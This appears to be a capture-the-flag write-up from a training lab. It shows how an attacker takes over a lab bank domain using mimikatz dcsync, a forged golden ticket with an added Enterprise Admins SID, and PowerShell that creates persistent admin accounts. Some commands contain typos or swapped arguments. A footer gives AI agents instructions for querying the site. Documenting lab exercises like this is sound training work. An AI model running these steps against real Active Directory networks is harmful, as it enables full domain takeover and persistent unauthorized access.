# Full Compromise of BANK Domain

## Summary

Using our golden ticket, we will open a `PowerShell` session with Administrator privileges with **`PsExec`** to create a user with full privileges on the rootdc.&#x20;

This grants access to `bankdc`, where we create a user in the bank domain and place proof of compromise on all available machines.

## Recon

With `PsExec` we open a PowerShell session with Administrator privileges.

<figure><img src="/files/O4RcPtCMRa3gzFbGznzk" alt=""><figcaption></figcaption></figure>

With the golden ticket in place, we can now retrieve the hash, using the SID we obtained in the previous section.

{% code overflow="wrap" %}

```
lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500
```

{% endcode %}

<figure><img src="/files/b2tZrg2pnu5upEwIxopd" alt=""><figcaption></figcaption></figure>

And we have the Administrator hash: `5e3d8d541c6d3891c20a503464869fa9`

## Breaching BANK Domain (10.200.XXX.101)&#x20;

We craft another golden ticket as `krbtgt`.&#x20;

{% code overflow="wrap" %}

```
kerberos::golden /user:krbtgt /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt
```

{% endcode %}

To maintain persistence and enable login without generating new tickets, we can create a new user with the `PowerShell` session with Administrator privileges and add it to the Enterprise Admins group with the following PowerShell commands:

{% code overflow="wrap" %}

```powershell
$pwd =ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name <username> -AccountPassword $pwd -PasswordNeverExpires $ture -Enabled $true
$User = Get-ADUser -Identity "<username>" -Server "rootdc.thereserve.loc"
$Group = Get-ADGroup -Identity "Enterprise Admin" -Server "rootdc.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "rootdc.thereserve.loc"
```

{% endcode %}

Now that we are Enterprise Admins, the compromise of the other child domain should be easy. We can start by connecting through `RDP` into the `BANKDC` from `ROOTDC`, with our newly created user

We can use the same commands to create a user at `CORPDC` as a Domain Admin, enabling us to log in with accounts in both domains:

{% code overflow="wrap" %}

```powershell
$pwd =ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name <username> -AccountPassword $pwd -PasswordNeverExpires $ture -Enabled $true
$User = Get-ADUser -Identity "<username>" -Server "corpdc.bank.thereserve.loc"
$Group = Get-ADGroup -Identity "Domain Admin" -Server "corpdc.bank.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "corpdc.bank.thereserve.loc"
```

{% endcode %}

<figure><img src="/files/ZFzvGzCp4H7ovDoCKQra" alt=""><figcaption></figcaption></figure>

Now, we can repeat the process of creating a user in the BANK domain, as a Domain Admin, using the  previous code:

{% code overflow="wrap" %}

```powershell
$pwd =ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name <username> -AccountPassword $pwd -PasswordNeverExpires $ture -Enabled $true
$User = Get-ADUser -Identity "Domain Admins" -Server "bankdc.bank.thereserve.loc"
$Group = Get-ADGroup -Identity "<username>" -Server "bankdc.bank.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "bankdc.bank.thereserve.loc"
```

{% endcode %}

Now, using the newly created Domain Admin account we attempt to place our proof of compromise on all target machines using the `runas` command. This way, we can avoid using `RDP` for each individual machine, streamlining the process significantly.

<figure><img src="/files/XNCOokx3T85DT6Cb38NU" alt=""><figcaption></figcaption></figure>

To avoid repeatedly entering a password when using runas, we can open a command prompt as the `bank\<Username>` user and keep the terminal open using the `/k` switch. This way, we can execute all necessary commands from a single session to place our proofs.

## Flags 9 -14

{% hint style="info" %}
**NOTE**: We are now able to obtain the following flags by following the instructions on the e-citizen platform:

* **Flag 9**: Foothold on Bank Division Tier 2 Infrastructure
* **Flag 10**: Administrative access to Bank Division Tier 2 Infrastructure
* **Flag 11**: Foothold on Bank Division Tier 1 Infrastructure
* **Flag 12**: Administrative access to Bank Division Tier 1 Infrastructure
* **Flag 13**: Foothold on Bank Division Tier 0 Infrastructure
* **Flag 14**: Administrative access to Bank Division Tier 0 Infrastructure

**We can also do the above by using the network path as it is easier for authentication and accessing the file system in File Explorer.**
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://bunring.gitbook.io/ctf-writeups/red-team-capstone-challenge-tryhackme/full-compromise-of-bank-domain.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.